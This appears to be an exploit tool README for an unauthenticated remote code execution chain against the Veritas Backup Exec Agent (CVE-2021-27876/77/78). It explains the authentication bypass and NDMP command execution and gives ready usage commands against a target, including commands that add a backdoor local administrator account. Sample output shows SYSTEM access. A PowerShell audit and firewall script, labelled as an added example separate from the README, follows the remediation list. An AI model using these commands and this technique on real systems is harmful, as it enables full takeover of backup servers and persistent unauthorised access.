## https://sploitus.com/exploit?id=1AB449BE-C315-5C63-8B4A-EB0F08C31177
# CVE-2021-27876
Unauthenticated RCE exploit for Veritas Backup Exec Agent (CVE-2021-27876/77/78): SHA auth bypass to SYSTEM via NDMP

## CVEs

| CVE | Description | CVSS 3.1 |
|---|---|---|
| CVE-2021-27876 | Authentication bypass via SHA hash manipulation in the NDMP protocol | 9.8 Critical |
| CVE-2021-27877 | Unauthenticated arbitrary file read via NDMP | 9.8 Critical |
| CVE-2021-27878 | Arbitrary OS command execution via `NDMP_EXECUTE_COMMAND` | 9.8 Critical |

**Advisory:** Veritas VTS21-003

## Affected Versions

- Backup Exec 16.x
- Backup Exec 20.x
- Backup Exec 21.x ≤ 21.2 (agent revision ≤ 9.3)

**Fixed in:** Backup Exec 21.3 and later.

---

## How It Works

The Veritas Backup Exec Agent listens on TCP/10000 and speaks NDMP (Network Data Management Protocol). The exploit chains three weaknesses:

1. **TLS handshake abuse**: the agent presents a CSR during its custom TLS negotiation. The exploit generates a local CA, signs the agent's CSR, and completes the handshake, upgrading the socket to TLS without any pre-shared secret.

2. **SHA auth bypass (CVE-2021-27876)**: the NDMP SHA authentication computes `SHA256('\x00' * 64 + challenge)`. Because the password is prepended as a 64-byte zero-padded block and the server never validates the password material, any client can authenticate as `Administrator` without knowing the password.

3. **NDMP_EXECUTE_COMMAND (CVE-2021-27878)**: once authenticated, the `NDMP_EXECUTE_COMMAND` message type runs arbitrary OS commands as `NT AUTHORITY\SYSTEM`. Output is redirected to `C:\Windows\Temp\_be_out.txt` and read back via `NDMP_FILE_READ`.

---

## Requirements

- Python 3.8+
- `pip install cryptography`

---

## Usage

```bash
python3 be_rce.py <target> "<command>"
```

**Examples:**

```bash
# Confirm SYSTEM access
python3 be_rce.py 10.10.10.50 "whoami"

# Dump hostname and domain
python3 be_rce.py 10.10.10.50 "whoami /all"

# Add a local admin
python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"
```

Sample output:

```text
[*] Connecting to 10.10.10.50:10000
[*] NDMP version: 9
[+] NDMP connection opened
[*] Generating CA certificate
[*] Got agent CSR (1024 bytes)
[*] Signed agent CSR and sent back
[*] SSL_HANDSHAKE CONNECT sent
[*] Upgrading to TLS
[+] TLS established
[*] Requesting SHA challenge
[*] Got 64-byte SHA challenge
[+] SHA authentication bypassed!
[*] Executing: whoami
[+] Command output:
────────────────────────────────────────
nt authority\system
────────────────────────────────────────
```
---

## Remediation

- Upgrade Veritas Backup Exec Agent to 21.3 or later on all hosts
- Restrict TCP/10000 to authorised backup management hosts via host firewall and network ACLs
- Audit all hosts running the Backup Exec agent across your environment
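Host-side audit and containment for the three remediation points above, as an added example that is not the README's own code: it checks the installed agent version against the 21.3 fix, reports whether TCP/10000 is listening, and scopes the inbound firewall rule to the management hosts. The Uninstall-key `DisplayName` match, the `21.x` form of `DisplayVersion` and the `$AllowedHosts` addresses are assumptions, not facts from the advisory.

```powershell
# Added example, not code from the exploit README: audit and containment for the
# Backup Exec agent port on a Windows host. Assumptions (not from the page): the agent's
# Uninstall entry has a DisplayName containing "Backup Exec" and a DisplayVersion in
# "21.x" form; $AllowedHosts are your backup management servers.
$AllowedHosts = @('192.0.2.10', '192.0.2.11')   # placeholder management-server addresses
$FixedVersion = [version]'21.3'                 # advisory: fixed in Backup Exec 21.3 and later
$RuleName     = 'Backup Exec Agent - TCP/10000 from management hosts only'

# 1. Inventory: read the installed agent version from the Uninstall registry keys.
$uninstall = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
               'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*')
Get-ItemProperty -Path $uninstall -ErrorAction SilentlyContinue |
    Where-Object { $_.DisplayName -like '*Backup Exec*' } |
    ForEach-Object {
        try   { $v = [version]($_.DisplayVersion -replace '[^0-9.].*$', '') }
        catch { $v = $null }
        $state = if ($null -eq $v) { 'UNKNOWN VERSION' }
                 elseif ($v -lt $FixedVersion) { 'VULNERABLE (below 21.3)' }
                 else { 'patched' }
        Write-Output ('{0} {1}: {2}' -f $_.DisplayName, $_.DisplayVersion, $state)
    }

# 2. Exposure: is anything listening on TCP/10000 right now?
$listener = Get-NetTCPConnection -LocalPort 10000 -State Listen -ErrorAction SilentlyContinue
if ($listener) { Write-Output "TCP/10000 is listening (PID $($listener[0].OwningProcess))" }

# 3. Containment. Windows Firewall evaluates Block rules before Allow rules, so a blanket
#    Block on 10000 would also cut off the management hosts. Keep the profile default
#    (inbound Block), disable every broader inbound Allow rule for the port, and add a
#    single Allow rule scoped to $AllowedHosts.
Get-NetFirewallProfile | Where-Object { $_.DefaultInboundAction -ne 'Block' } |
    ForEach-Object { Write-Warning "Profile $($_.Name): default inbound action is $($_.DefaultInboundAction)" }

Get-NetFirewallPortFilter -Protocol TCP | Where-Object { $_.LocalPort -eq '10000' } |
    Get-NetFirewallRule |
    Where-Object { $_.Direction -eq 'Inbound' -and $_.Action -eq 'Allow' -and $_.DisplayName -ne $RuleName } |
    ForEach-Object { Write-Output "Disabling broad rule: $($_.DisplayName)"; $_ | Disable-NetFirewallRule }

if (-not (Get-NetFirewallRule -DisplayName $RuleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $RuleName -Direction Inbound -Protocol TCP -LocalPort 10000 `
        -RemoteAddress $AllowedHosts -Action Allow | Out-Null
    Write-Output "Created scoped allow rule '$RuleName'"
}
```

Run it elevated on each agent host; network ACLs upstream of the host should mirror the same management-host allow list, since a host firewall alone does not help once an attacker is already local.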

---

## References

- https://www.veritas.com/support/en_US/security/VTS21-003
- https://nvd.nist.gov/vuln/detail/CVE-2021-27876
- https://nvd.nist.gov/vuln/detail/CVE-2021-27877
- https://nvd.nist.gov/vuln/detail/CVE-2021-27878
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

---

## Legal

This tool is provided for authorised penetration testing and security research only. Use against systems without explicit written permission is illegal. The author accepts no liability for misuse.